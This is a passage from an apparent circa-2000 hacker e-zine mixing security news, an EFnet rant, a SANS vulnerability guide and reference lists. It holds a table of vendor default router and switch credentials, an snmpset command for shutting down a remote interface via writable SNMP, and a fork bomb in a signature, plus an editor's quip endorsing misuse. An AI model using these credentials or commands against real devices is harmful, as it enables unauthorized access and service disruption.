      Levin of St. Petersburg was sentenced to three years in a U.S. prison for 
      stealing $3.7 million from Citibank accounts in 1995 using a personal 
      computer. He was arrested in Britain and extradited to the USA.

      Hackers apparently working from Russia rummaged in Department of Defense 
      computers for more than a year and stole reams of information. No 
      top-secret material was stolen, the Pentagon says. Computers at NASA and 
      Energy Department nuclear weapons labs also were raided. Investigators 
      don't know who was behind the attack, but some say they suspect Russian 
      intelligence services.
      
      Related story:
      Hackers drawn by thrills, challenge, cash
      
       
       
      Russia's Foreign Intelligence Service has denied it. The agency says it 
      would be too obvious to hack from inside Russia.

      Why does so much mischief emanate from Russia? The hacker problem begins 
      in school, where hacking habits are rife, Russian computer professionals 
      say. 

      During Soviet times, the government and universities actually encouraged 
      people to copy Western software.

      Sometimes lacking the printed data that come with store-bought software, 
      people began taking programs apart to see how they worked. "People had to 
      hack programs to learn them and adapt them to Soviet technical 
      conditions," says Mikhail Salnikov, head of Compulog computer consultants 
      and a veteran of the early days of personal computers in Russia.

      The Soviet government, by copying Western computer technology rather than 
      developing its own versions, was the first hacker, Salnikov says. Combine 
      that with Russia's high level of technical education and the result is a 
      culture in which many people think copying software is no big deal. Those 
      people also have the skills to steal passwords or defeat software security 
      features designed to thwart copying.

      Maj. Dmitry Chepchugov, head of the Interior Ministry's elite 
      anti-computer crime unit, says poverty plays a role, especially in 
      password theft. "We have many people who need the Internet but don't have 
      the money," he says. So they piggyback on someone else's access.

      Otherwise honest people, he says, see nothing wrong in illegal copies, 
      especially when a legal copy can cost a month's wages. "It's only in the 
      past four years that people have begun to see the theft of intellectual 
      property as the same as the theft of real property," he says. "It's an 
      intellectual - and a generational - problem."

      In hopes of wresting some of the bigger customers away from the Gorbushka, 
      manufacturers conduct aggressive education campaigns about software 
      compliance in Russia's corporate sector. However, education among Russian 
      software users might not be enough to stop the threat Russian software 
      thieves present.

      Macromedia, a San Francisco-based company that produces Web-design 
      software, is not a major player in the Russian market. Still, it can't 
      afford to ignore piracy here. Steve Wozniak, director of the company's 
      anti-piracy programs, says Macromedia software has been sold over the 
      Internet from Russia to customers in the West. Russians also have set up 
      Web sites that give away "cracks" for Macromedia software - essentially 
      providing the intellectual tools for would-be pirates.

      Russia rivals China for world leadership in software piracy; about 92% of 
      business software running on Russian machines is estimated to be bootleg, 
      according to the Business Software Alliance, a U.S.-based industry group. 
      Recent estimates put the value of the stolen software at $273 million.

      That's not to say corporations aren't making any money in Russia. "By 
      selling only to 8% of potential customers, Microsoft-Russia sales are 
      about $25 million," says Eugene Danilov, Microsoft-Russia's marketing 
      manager. "Imagine what additional revenue could be generated if piracy was 
      reduced to 80%, 70%."
      
      Contributing: Sarah Karush
       
      
      
      @HWA
      
      
252.0 [TXT] Treatise: "Why EFnet Sucks." by: Anonoymous Whiner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Date unknown: sourced from Mixter's archives

      http://mixter.warrior2k.com.
      
      Brief history, prologue:
      
      EFnet is "Eris Free" net. In a nutshell a rogue system on a young
      IRC (Internet Relay Chat) network constantly caused problems for
      the other systems and anarchy in their midst, consequently they
      were de-linked (removed from network access) and banished to go
      form their own network.
      
      The offending system named "Eris" was now absent and it was 
      conceded to call the new net "Eris Free" as they were now rid
      of the offending machine.,,, 
      
      Brief rant by the Editor follows:      
      
      
      IRC Basically came to life in 1989 with the coding of ircd so no more
      talkd hacks were needed for meetings, personally I believe EFnet is 
      the place to be, but then I grew up here. It was the new frontier you
      posted your claim stakes then fought to keep your territories. Its a 
      little different in the methodology today but the pyschology and 
      dynamics are essentially the same. 
      
      I refuse to give up on a good system simply because some strong
      willed oppionated individuals want to throw their inflated power
      fed ego's around causing chaos in our midst. Deal with the issues
      correct the wrongs and continue on. Don't just abandon ship and
      move on hoping the next one doesn't develop some of the SAME
      holes.... - my 2c (See article on EFnet owning later in this issue)
       :- Cruciphux
      
      Date: Unknown i'd say 1995-8 but could be wrong.
      
      And now, the file:
      
      *****************************************************************
      
                        Why EFnet sucks
                        ===============
      
      * The four main reasons
      * The summary
      * The conclusion
      
      1. Rules
      The policies of efnet are certainly hippocratic. The main goal
      of efnet was to provide a free network with a minimum of "laws"
      that ensure its stability. The main idea was to create a network
      where no channels, nicknames, or other virtual resources within
      irc are "owned" by anyone. One main statute was also that irc
      operators don't involve in channel and user matters, as long
      it is non relevant to an actual problem with an irc server.
      Look at efnet today, many opers abuse their powers, involve in
      senseless conflicts, take over channels and certain nicknames,
      sometimes in co-operation with takeover groups, and hire un-talented
      accomplices to find bots, spammers or "deal" with "abusers".
      
      2. Routing and Administration
      The efnet team is incapable of agreeing on many, many things.
      They don't manage to use an uniform version of the ircd code,
      some servers never upgrade, others upgrade always without asking
      others, etc. This results in a chaotic ircd infrastructure, and
      some servers vulnerable to certain channel security problems, while
      others are not, or vulnerable to other problems. The efnet guidelines
      to get a link to the efnet backbone are also very un-efficient. While
      some powerful servers with high bandwidth are denied links because
      their link is declined in the act of voting, instead of following
      objective guidelines, other peoples servers who are already known
      to the efnet team because they're oper or anything are accepted
      even if they do not provide appropriate resources. IRC Operators
      tend to non-tolerated behavior (abuse, random klines) and many have
      lost their o-lines, while others, who have more "authority", can
      get away with almost everything.
      
      3. Ircd development
      Both ircd servers, the version developed by the hybrid team, and
      the version developed by Chris Behrens are not coded with optimization
      and an increase of user functionality in mind, but instead
      more and more paranoid fixes and flood detection are applied to
      them, with the goal to give the opers more "power" over their
      network, and to automatically detect abuse without doing much.
      As mentioned before, the actual guidelines of efnet do originally
      permit many of the kinds of "abuse", like channel takeovers,
      running bots, etc. Nevertheless, the recent security features
      do actually cripple the functionality of the efnet network.
      Examples for hybrid5 / CS irc daemons:
      - opers can cycle channels without delay, they can set channel modes
        without delay, while normal users requests are delayed intentionally
      - opers can gain channel ops on netsplits, while it is almost
        impossible for users, resulting in increased attacking of the
        servers by takeover groups to cause them to split more frequently
      - users who do not send messages for a certain time are disconnected,
        forcing all efnet servers to have a policy against idling
      - joining a channel and parting it immediately, as well as
        channel CTCP requests, will alert every oper on the server
        telling them your private channel name, your nickname, and
        if a tcm (monitoring bot) is running, it will automatically
        suggest the server operators to k-line the user.
        because of cycling or ctcp'ing a channel.
      Examples for hybrid6 (will be the new standard):
      - The normal user can no longer request STATS information, and
        other such like versions from a remote irc server, disabling
        a user with a problem to get administrative info or a list
        of active operators from that server he could request help from.
      - Multiple targets for messaging and noticing are no longer
        supported. This breaks the RFC for IRC again, and it will
        force many users to re-write their scripts or even clients.
      - Ban exemption like on ircd 2.10 is now supported, with all
        its vulnerability. Many clients cannot recognize +e modes,
        and it can be used in channel take over, to make flooders/takers
        unable to be banned out of a channel until the mode is removed.
      
      If all this is not enough, there is conformed insider information,
      that four major efnet servers are currently running in debug
      mode, which enables them to see ALL private traffic, like
      private chat, passwords sent to channel protection bots, messages,
      etc. and the information is being filtered and sent to the
      FBI, which requested this. Currently, a big EDU server, an
      .ORG server, an European server, and a server of a major ISP
      which are all linked to efnet, are monitoring traffic via DEBUG MODE.
      
      4. Channel takeover groups
      Takeover has always been present on efnet, and in the
      past it has not been a big threat to servers or users. However,
      the new wave of takeover people is using high-bandwidth attacks
      against servers and users, causing several damage to everyone,
      and threatening the major channels of efnet which are their
      primary target. One problem is, that "new school" takeover
      people actively compromise hundreds of random servers over
      the internet, with the single purpose to use the boxes with
      high bandwidth connectivity to attack irc servers and irc
      clients. Group members co-operate to gather their power
      against anyone, being a serious threat to anyone they decide
      to attack because of whatever reason. Also, there has been
      a big recent increase of shell services on the internet,
      who offer high-bandwidth access, like it had only been
      available to educational institutions and enterprises before,
      to everyone for prices as low as $5 per month. Today,
      everyone can afford this technology along with fancy long
      hostnames, that look like the hostnames used in spoofing
      attacks some years ago. But note, that these people are
      everything else than hackers. They have merely the knowledge
      on how to configure a bot or irc client and know 3-5 shell
      commands which they also use to attack from their compromised
      hosts and thats all. The problem is, that almost every
      teenager without a clue can nowadays get a shell, fancy
      hostname, which will eventually get him into a group with
      other people like him, who teach him the basic skills of
      compromising a server and running denial-of-service off it.
      
      Summary:
      As a normal user not willing to break into hosts or join
      a online rioting gang, you are helpless against takeovers,
      and the irc ops won't help you either.
      
      As an experienced user or hacker you are attacked by ircops
      because you are "abusive". You can join a 1337 takeover
      group if you can bear to deal with their lameness or stupidity...
      
      As a takeover kiddy you are in the gang of elite vhost
      ownerz and do pretty much what you want, while you attack
      servers with kinds of attack whose damage you probably
      cannot even evaluate. The size of your ego exceeds
      the size of your intellect and you have to play avoid-the
      k-line every day by carding new leet vhosts. If you are
      one of the dumbest sort of take kiddies you waste your
      additional free time with warez. You get what you want
      for the price of having neither a life or half a mind...
      
      As an irc operator or admin you are always involved in the
      hassle with other opers, who tell you what to do or what not,
      and if you get unpopular, your server will become a target
      for takeover d00ds. You can start becoming mr. evil mass
      k-liner which will undoubtly escalate the "war", and you
      might succeed to ban the takers and "abuse" with extreme
      aggression, against takers and probably innoccent people
      as well, from your server to another one, and/or worse,
      get in more dumb hassle with the ircop "community", maybe
      your o-line removed or your server delinked.
      
      Conclusion:
      Leave EFnet.
      
      Greets to Monk aka Monkster aka Monkiespankr how do you like this one.
      
      @HWA      
      

253.0 [HWA] Honeypots: who's fooling who?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      July 2000
      
      By Cruciphux
      
      First of all, what is a honeypot?, A honeypot is a phrase coined to
      describe a system that is either inentionally weak in security or is
      placed outside a company's firewall to distract would be crackers or
      attackers from the real valuable content 'protected' concealed
      within. 
      
      This practice has been the source of much debate since its inception
      and use by several companies and security outfits on the net, it should
      be noted that honeypots are not the exclusive domain of the good guys 
      ('white hats') currently employing this tactic.
      
      <incomplete>
      
      @HWA
      
      
      


254.0 [IND] Hacking Away At Government
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060200a_j.shtml     
      
      6/2/00
      Hacking Away At Government
      By Christopher Swope, Governing Magazine, June 2000
      
      HIGHLIGHT: In the race to get online, network security has been something 
      of an afterthought. But even the most obscure agency can be a target for 
      Internet intruders.

      BODY: "Fresno Means Business" is the first thing you see when you visit 
      the California city's Web page, and to emphasize the point, there is a 
      collage of pictures showing the downtown skyline and business people 
      working. The message, the collage says in so many words, is "Development 
      and Economic Vitality." So you can imagine city officials' displeasure one 
      day last November when the skyline and business people were suddenly gone, 
      replaced with a different message: "Hacked by globher."

      It wasn't the first time Fresno's site had been hacked. Three weeks 
      earlier, another intruder had taken down the site and replaced it with 
      boastful gibberish and profanity. Fortunately, during both incidents, no 
      major damage was done, and each time the city's Web team had the site 
      cleaned up in less than an hour. "We thought we were covered, but they 
      knew the tricks to get into the server," says Allen Smith, Fresno's 
      webmaster. "If we had kept up with Microsoft's security alerts, we would 
      have been OK."

      If officials in Fresno are a bit embarrassed by these incidents, they have 
      plenty of company.

      According to records on Web site defacements kept by attrition.org, a 
      hacking watchdog, more than five dozen state and local governments or 
      agencies were attacked in the six months between November and April. The 
      day after the second hit on Fresno, for example, a hacker who goes by the 
      name "YTCracker" attacked one of the less likely targets in the state of 
      New York: the Department of Agriculture and Markets. Again, no serious 
      harm was done, although it also must have left some in the department 
      blushing. Among other things, the hacker scrawled the quote "YTCracker is 
      cool" under a picture of Governor George Pataki. "The whole episode really 
      woke us up to the possibility that even we can get hacked," says Peter 
      Gregg, a department spokesman. "We figured, who'd want to hack us?"

      By now, most state and local governments have staked out a presence on the 
      Internet, but in the race to get online, network security has been 
      something of an afterthought. What they're starting to find--some of them 
      the hard way--is that anyone on the Internet, even the most obscure 
      government agency, is a target for computer hackers. "It's really a matter 
      of when, not if, you'll be attacked," says Mark Zajicek a computer 
      security expert with the CERT Coordination Center at Carnegie Mellon 
      University. "Once you connect to the Internet, the rest of the Internet is 
      connected to you."

      Fresno, like most places that have been hit by hackers so far, was lucky: 
      The site contained only such static information as press releases, job 
      listings and city phone numbers. This time around, the hacker attacks 
      amounted to little more than digital graffiti. The damage, in fact, was 
      probably easier to remove than spray paint from a wall.

      In the era of digital government, however, network security will only 
      increase in importance and complexity. Fresno, like nearly every state, 
      city and county, is looking into delivering services online, from tax 
      collection to issuing permits. It is an exciting development, but the flip 
      side is that each new service opens a channel into government computer 
      networks for hackers to exploit.

      Web-enabled government not only exposes a new Achilles heel to malicious 
      hackers but also elevates the battle against them to a new level. To 
      hackers, a digital government is simply a juicier target. There is more 
      havoc to wreak by breaking in, and more notoriety to be gained. To state 
      and local governments, credibility is on the line: The success or failure 
      of their Web ventures will hinge on citizens' faith in their security to 
      use them. "Every time a state or local government moves a new process into 
      the cyber-domain, it raises vulnerability," says Steven Trevino, an 
      executive with Infrastructure Defense Inc., a network security firm that 
      is working with Public Technology Inc. to assess the security needs of 
      local governments. "It's a risk-management proposition they've never had 
      to deal with."
      
      SNIFFING OUT HACKERS
      
      The war on hackers, quite expectedly, has spawned a booming market for 
      security software and hardware. State and local governments are installing 
      firewalls to separate data on internal systems from what goes up on the 
      Web. Soon after being hacked, the New York agriculture department stocked 
      up on intrusion-detection software that can sniff out a hacker's moves 
      before any damage is done. The scary thing, however, is that even vendors 
      who sell the stuff admit that no amount of network protection could keep 
      out the smartest, most dedicated hackers.

      Of course, one doesn't even need to be a computer geek to be a hacker 
      these days. Anyone can learn the basics by visiting a number of Web sites 
      that essentially teach "hacking for dummies" lessons. Even a lot of the 
      technical work of hacking has been automated, in programs that can be 
      downloaded off the Internet for free.

      In many ways, network security is a cat-and-mouse game. Nearly every piece 
      of technology running the Internet today has a bug in it somewhere for 
      hackers to exploit. Companies such as Microsoft are continually issuing 
      security warnings about holes in their software, and offering "patches" 
      that fix the problem. Of course, the bad guys pay attention to these 
      warnings too, and use them as a road map for breaking into systems that 
      haven't been updated. "Just buying the latest commercial products may give 
      you a false sense of security," says Zajicek. "Unless you're continually 
      upgrading, it's just a race between your product and the latest attack 
      methods."

      While spending money on upgrading software and hardware can certainly 
      help, that is the easy part, security experts say. The hard part is 
      cultivating a management culture that recognizes the importance of 
      security and the urgency of addressing security issues quickly. The 
      political need to get more information and new services online as fast as 
      possible often trumps the practical need to have a well-fortified site. 
      Moreover, many state and local IT departments are chronically 
      understaffed, already tugged in a hundred different directions.

      The lesson, management-wise, from a recent security incident in the city 
      of Sunnyvale, California, is that it pays to be proactive. Back in 
      February, at the same time that popular Web sites such as Yahoo!, eBay and 
      CNN.com were being shut down by so-called "distributed denial of service" 
      attacks, Sunnyvale's IT managers noticed that something funny was 
      happening to their site, too. Traffic suddenly shot up six-fold, and 
      engineers determined that much of the increased traffic was coming from 
      one particular address in Virginia. They immediately took measures to 
      block hits from that address, and the problem went away.

      Sunnyvale Chief Information Officer Shawn Hernandez says he's still not 
      sure whether the incident was related to the attacks on Yahoo! and the 
      others. And unlike those attacks, the increased traffic on Sunnyvale's 
      site never peaked high enough to shut it down. That's all the more reason 
      to take a proactive stance. "You have to constantly monitor your network, 
      be familiar with the level of traffic expected, and zero in on that when 
      it fluctuates," Hernandez says. "When you see abnormal situations, you 
      need to investigate and jump on it immediately."
      
      HIRING WHITE HATS
      
      In that vein, security experts say that every government on the Web should 
      be aware of what its security weaknesses are. Some have taken to hiring 
      ethical hackers, or "white hats," who break into their systems in order to 
      assess what holes exist. Ideally, governments should patch those holes up, 
      or at bare minimum, monitor them closely, and should have a plan for 
      dealing with hacker attacks when they do, inevitably, happen. 
      Unfortunately, it is often not until a security breach occurs that a more 
      comprehensive security plan takes shape. By then, of course, it is too 
      late--although not too late to keep it from happening again. It took just 
      13 minutes last March for a hacker to break into the Web page of the 
      Oklahoma Department of Libraries. But it took six days for the department 
      to get the site back up. In the wake of the incident, Web development 
      officer Michael O'Hasson performed an extensive security assessment and 
      shared lessons from the episode at a state Web managers' meeting.

      The lessons read like a self-help pamphlet for techies. "Do not think that 
      obscurity will save you," says one. "Never assume that prior security 
      patches were done before," reads another. The other points make clear the 
      need to have contingency plans in place, such as having a "summer home" 
      for a Web site, an alternate place to host the site in case of emergency.

      In the meantime, the Oklahoma Department of Libraries--like Fresno and a 
      lot of other state and local agencies that thought they were safe--can 
      take comfort in the fact that this round with the hackers has really been 
      something of an exhibition match. It's the next round, with confidential 
      taxpayer data and credit-card numbers at stake, when the score will really 
      count. "The break-in right now is actually good for us," says Allen Smith, 
      the Fresno webmaster. "We don't have that stuff out there now, but we're 
      planning on it. Actually, it's good timing, because it made us more aware 
      of what we need to look at." 
      
      @HWA
      
      
255.0 [IND] The DEPL and other Default password lists
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Compiled by Cruci. (May/Updated/Nov 2000)
      
      Scarfed from the VULNDEV full disclosure security mailing list
      (Security Focus), PacketStorm and other sources.
      
      http://www.phenoelit.de/dpl/dpl.html
      http://packetstorm.securify.com/docs/hack/defaultpasswords.txt
            
      Double edged swords.... use in an ethical manner... unless you REALLY
      must fuck someone over and they like deserve it or some shit. - Ed :-o
      
      
      $Id: dpl.html,v 1.5 2000/07/13 06:06:39 lists Exp lists $
      
      { Included in archive. }
      
      If you did not recieve the DEPL in your archive complain to your distributor
      sorry, no refunds, no exchanges.
      
      Suplimentary Listing:
      
         
      Default usernames and passwords for Routers/Switches/Hubs and others thingies
    
       Type/vendor/notes/etc                     Username Password
       
       3Com                                      admin    synnet
       3Com                                      read     synnet
       3Com                                      write    synnet
       3Com                                      monitor  monitor
       3Com                                      manager  manager
       3Com                                      security security
       3Com_Office_Connect_5x0_ISDN_Routers      n/a      PASSWORD
       3comCellPlex7000                          tech     tech
       3comCoreBuilder7000/6000/3500/2500        debug    synnet
       3comCoreBuilder7000/6000/3500/2500        tech     tech
       3comHiPerARCv4.1.x                        adm      <blank>
       3ComLANplex2500                           debug    synnet
       3ComLANplex2500                           tech     tech
       3comLinkSwitch2000/2700                   tech     tech
       3comSuperStackIISwitch                    2200     debug
       3comSuperStackIISwitch                    2700     tech
       ACC(Ericsson)                             netman   netman
       ADC_Kentrox_Pacesetter_Router             n/a      secret
       All_Zyxel_equipment                       n/a      1234
       AT&T_3B2_firmware                         n/a      mcp
       AXIS200/240[netcam]                       root     pass
       Bay_routers                               Manager  <blank>
       Bay_routers                               User     <blank>
       Bay350T_Switch                            n/a      NetICs
       BaySuperstackII                           security security
       BRASX/I01_(DataCom)                       n/a      letmein
       BreezeCOM_adapters2.x(console_only)       n/a      laflaf
       BreezeCOM_adapters3.x(console_only)       n/a      Master
       BreezeCOM_adapters4.x(console_only)       n/a      Super
       Cayman_DSL                                n/a      <blank>
       Crystalview_outsideview32                 n/a      crystal
       digiCorp_(viper?)                         n/a      BRIDGE
       digiCorp_(viper?)                         n/a      password
       DLink_hub/switches                        D-Link   D-Link
       Flowpoint_DSL_installed_by_Covad          n/a      password
       Flowpoint_DSL2000                         admin    admin
       Jetform_design                            Jetform  n/a
       Lantronics_Terminal_server_port           7000     n/a
       Lantronics_Terminal_server_port           7000     n/a
       Linksys_DSL                               n/a      admin
       Livingston_IRX_router                     !root    <blank>
       Livingston_officerouter                   !root    <blank>
       Livingston_portmaster2/3                  !root    <blank>
       Microplex_print_server                    root     root
       Motorola-Cablerouter                      cablecom router
       Netopia_7100                              <blank>  <blank>
       Netopia_9500                              netopia  netopia
       Orbitor_console                           n/a      password
       Orbitor_console                           n/a      BRIDGE
       Osicom(Datacom)                           sysadm   sysadm
       Shiva                                     root     <blank>
       Shiva                                     Guest    <blank>
       SpeedstreamDSL(Efficient)                 n/a      admin
       UClinux_for_UCsimm                        root     uClinux
       Webramp                                   wradmin  trancell
       Alteon ACEswitch 180e (web)               admin    admin
       Alteon ACEswitch 180e (telnet)            admin    <blank>
       NETPrint (all)                            n/a      sysadm
       Xylan Omniswitch                          admin    switch
       Xylan Omniswitch                          diag     switch
       AcceleratedDSL CPE and DSLAM              sysadm   anicust
       Arrowpoint                                admin    system
       Cabletron (routers & switches)            <blank>  <blank>
       
       Needed
       
       Packeteer
       Cabletron
       SMC
       Accton
       
       Contributed by:
       
       Stephen Friedl <friedl@mtndew.com>
       Sebastian Andersson <bofh@diegeekdie.com>
       Jonathan Leto <jonathan@leto.net>
       mat@ivntech.com
       Mike Blomgren <mike.blomgren@knowit.se>
       Knud Erik Hjgaard <knud@cybercity.dk>
       mobileunit@mobileunit.org
       Roelof Temmingh <roelof@sensepost.com>
       Axel Dunkel <ad@Dunkel.de>
       Mathias Bogaert" <pathos@pandora.be>
       extracts from "Hacking Exposed"
       Jonathan Leto <jonathan@leto.net>
       Chris Owen <chris@totalconnect.com>
       Jim Wildman <jim@rossberry.com>
       Santiago Zapata <szapata@creatos.com.mx>
       Brian S. DuRoss <briand@cac.net>
       Eric Knight <deceased1@HOME.COM>
       Max Vision vision@whitehats.com
       Lou Albano mistert@dslnet.com
       
       Last Updated on Fri Jul 7 02:14:22 SAST 2000
       By Roelof Temmingh
       Email: roelof@sensepost.com 
       
      World writeable SNMP communities:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Days ago, there was a discussion about world-readable snmp communities,
      some people thought it was bad enough. Amazingly, I've found that a lot of
      network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL
      modems, remote access machines and even some user-end operating systems)
      are by default configured with snmp enabled and unlimited access with
      *write* privledges. It allows attacker to modify routing tables, status of
      network interfaces and other vital system data, and seems to be extermely
      dangerous. To make things even worse, some devices seems to tell that
      write permission for given community is disabled, but you can still
      successfully write to it - and other devices won't let you to set up snmp
      access at all (eg. some modems and switches).
      
      Here's brief list of devices I've found with world-writable communities -
      and names of these communities, respectively:
      
      - 3com Switch 3300 (3Com SuperStack II) - private
      - Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
      - 3com RAS (HiPer Access Router Card) - public
      - Prestige 128 / 128 Plus - public
      - COLTSOHO 2.00.21 - private
      - PRT BRI ISDN router - public
      - CrossCom XL 2 - private
      - WaiLAN Agate 700/800 - public
      - HPJ3245A HP Switch 800T - public
      - ES-2810 FORE ES-2810, Version 2.20 - public
      - Windows NT Version 4.0 - public
      - Windows 98 (not 95) - public
      - Sun/SPARC Ultra 10 (Ultra-5_10) - private
      
      This list is for sure uncomplete, and might be inaccurate - it has been
      created after extensive, but only remote tests on devices outside my
      network (usually, these machines are inside ISP networks).
      
      On following devices, some parameters can be changed, but some can't - so
      it seems to be less dangerous:
      
      - HP LaserJet (EEPROM G.08.03) - public
      - PICO router - public
      - Xyplex Router 6.1.1 - private
      
      Best solutions:
      
      - try to disable unlimited snmp access, if possible, then check if it
        really worked,
      - ask vendor for firmware upgrade,
      - do not route traffic addressed to snmp-enabled devices from outside.
      
      Other systems: Cisco and Motorola routers, Netware, most Unix boxes are
      not vulnerable.
      
      Exploit code:
      
      $ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2
      
      ...should bring 1st network interface on remote machine down... for more
      interesting options to be set, execute:
      
      $ snmpwalk hostname {private|public}
      
      _______________________________________________________
      Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
      [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
      [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
      =-----=> God is real, unless declared integer. <=-----=
      
      


      
      @HWA
      
             
256.0 [IND] Security Firm To List Additional Hacking Threats
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
      June 2 2000
      www.infowar.com
      http://www.infowar.com/hacker/00/hack_060200b_j.shtml     
      
      6/2/00
      Security Firm To List Additional Hacking Threats
      By David McGuire, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      02 Jun 2000, 4:49 PM CST
      
      While Thursday's unveiling of the 10 most dire Internet security threats 
      has already generated widespread discussion in the technology community, 
      one cyber-security firm is warning against taking the list at face value.

      Published Thursday by the not-for-profit SANS (System Administration, 
      Networking and Security) Institute, the highly technical "Ten Most 
      Critical Internet Security Threats" list is a valuable document, but 
      should not be seen as the end-all and be-all of security concerns, Network 
      Security Technologies (NETSEC) Vice President Joseph Nowland said today.

      The threats listed in the document are just the "tip on the iceberg," 
      Nowland said, warning network administrators not to feel safe simply 
      because they address the 10 concerns outlined by SANS. NETSEC intends next 
      week to release its own supplemented list of Internet security threats 
      identified by its in-house team of hackers, Nowland said.

      SANS leaders agree that the list of security threats, which reads like 
      Egyptian hieroglyph to the technologically uninitiated, is just a stepping 
      off point for addressing security concerns.

      "All we've done so far is define the problem," Stephen Northcutt, the 
      director of SANS' Global Incident Analysis Center, told Newsbytes on 
      Thursday. "The next step is to create a step-by-step repair (protocol) for 
      every single operating system on the face of the planet."

      Nowland said that NETSEC security experts became concerned when they say 
      news reports that seemed to indicate that the SANS document was somehow a 
      comprehensive list of cyber-threats.

      Organizations that simply fix those problems and think they are safe would 
      be in for a serious shock, Nowland said. NETSEC's list of additional 
      security threats will include holes not outlined in the SANS list, he 
      added.

      While the SANS Top 10 list, which is posted on the SANS Web site at 
      http://www.sans.org/topten.htm , contains links to patches for some of the 
      threats it enumerates, Northcutt said Thursday that a broader solution 
      will be much longer in coming.
      
      NETSEC's Web site is located at http://www.netsec.net . 
      
      @HWA
      
257.0 [IND] SANS: Top 10 hacker targets
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           Follow-up from previous article
      
      July 11 2000
      
      
      http://www.infowar.com/hacker/00/hack_060200b_j.shtml
      
           How To Eliminate The Ten Most Critical 
           Internet Security Threats
      The Experts Consensus 
      Version 1.24 July 11, 2000
      Copyright 2000, The SANS Institute 
        Log of updates
       
       v. 1.24 - 07/11/00
        Section added naming people who have helped 
        improve this document through their contributions
      v. 1.23 - 07/11/00
        Section 2 CVE List revised and updated
      v. 1.22 - 06/19/00
        Signatories updated 
      v. 1.21 - 06/16/00
        Signatories corrected 
      v. 1.20 - 06/15/00
        # 11 in "Perimeter Protection For An Added Layer 
        of Defense In Depth" section updated
      v. 1.19 - 06/12/00
        Correction - Section 8E moved to 7E. 
      v. 1.18 - 06/08/00
        Updated section 8E and F by adding diagnostic 
        and correction utility.
      v. 1.17 - 06/08/00
        Sections 4A and 4B updated
      v. 1.16 - 06/08/00
        # 11 in "Perimeter Protection For An Added Layer 
        of Defense In Depth" section updated
      v. 1.15 - 06/06/00
        Signatories corrected 
      v. 1.14 - 06/04/00
        Signatories corrected 
      v. 1.13 - 06/02/00
        Section 5A and 5B updated, 5C removed
      v. 1.12 - 06/02/00
        Section 7E updated
      v. 1.11 - 06/02/00
        Sections 3B & 6B SGI Software Patches updated 
       > Download this document in MS Word format
      > Download this document in .rtf (Rich Text) format 
       SANS Educational Programs
       
       SANS Parliament Hill 2000 August 21-24, 2000
      Network Security 2000 October 15-22, 2000 
      Stop the Break-Ins!
      
      The majority of successful attacks on computer systems via the Internet 
      can be traced to exploitation of one of a small number of security flaws. 
      Most of the systems compromised in the Solar Sunrise Pentagon hacking 
      incident were attacked through a single vulnerability. A related flaw was 
      exploited to break into many of the computers later used in massive 
      distributed denial of service attacks. Recent compromises of Windows 
      NT-based web servers are typically traced to entry via a well-known 
      vulnerability. Another vulnerability is widely thought to be the means 
      used to compromise more than 30,000 Linux systems.

      A few software vulnerabilities account for the majority of successful 
      attacks because attackers are opportunistic  taking the easiest and most 
      convenient route. They exploit the best-known flaws with the most 
      effective and widely available attack tools. They count on organizations 
      not fixing the problems, and they often attack indiscriminately, by 
      scanning the Internet for vulnerable systems.

      System administrators report that they have not corrected these flaws 
      because they simply do not know which of over 500 potential problems are 
      the ones that are most dangerous, and they are too busy to correct them 
      all.

      The information security community is meeting this problem head on by 
      identifying the most critical Internet security problem areas  the 
      clusters of vulnerabilities that system administrators need to eliminate 
      immediately. This consensus Top Ten list represents an unprecedented 
      example of active cooperation among industry, government, and academia. 
      The participants came together from the most security-conscious federal 
      agencies, from the leading security software vendors and consulting firms, 
      from the top university-based security programs, and from CERT/CC and the 
      SANS Institute. A complete list of participants may be found at the end of 
      this article.

      Here is the experts list of the Ten Most Often Exploited Internet 
      Security Flaws along with the actions needed to rid your systems of these 
      vulnerabilities. 
      
      Three Notes For Readers:
      
      Note 1. This is a living document. It includes initial, step-by-step instructions
              and pointers for correcting the flaws. We will update these instructions as
              more current or convenient methods are identified and we welcome your input.
              This is a community consensus document  your experience in eliminating the 
              vulnerabilities can help others who come after you. To make suggestions 
              e-mail info@sans.org with the subject Top Ten Comments. To get the latest
              version of the guidelines, e-mail info@sans.org with the subject Top Ten Fixes.
      
      Note 2. Youll find references to CVE numbers  the Common Vulnerabilities and 
              Exposures reference numbers that correspond with vulnerabilities. CAN numbers
              are candidates for CVE entries that are not yet fully verified. For more data
              on the award-winning CVE project, see http://cve.mitre.org. 
      
      Note 3. At the end of the list, youll find an extra section offering a list of the
              ports used by commonly probed and attacked services. By blocking traffic to
              those ports at the firewall or other network perimeter protection device, you
              add an extra layer of defense that helps protect you from configuration mistakes. 
       
      1. BIND weaknesses: nxt, qinv and in.named allow immediate root compromise. 
         The Berkeley Internet Name Domain (BIND) package is the most widely used implementation
         of Domain Name Service (DNS) -- the critical means by which we all locate systems on the
         Internet by name (e.g., www.sans.org) without having to know specific IP addresses -- and
         this makes it a favorite target for attack. Sadly, according to a mid-1999 survey, about 
         50% of all DNS servers connected to the Internet are running vulnerable versions of BIND.
         In a typical example of a BIND attack, intruders erased the system logs, and installed 
         tools to gain administrative access. They then compiled and installed IRC utilities and
         network scanning tools, which they used to scan more than a dozen class-B networks in search
         of additional systems running vulnerable versions of BIND. In a matter of minutes, they had 
         used the compromised system to attack hundreds of remote systems abroad, resulting in many 
         additional successful compromises. This illustrates the chaos that can result from a single
